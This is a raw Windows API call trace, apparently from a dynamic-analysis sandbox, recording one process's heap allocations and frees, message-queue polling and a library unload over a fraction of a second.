1 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9cdba0 | out: hHeap=0x8a0000) returned 1 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0164.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.618] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0164.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0164.622] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.622] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0164.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0164.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0164.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 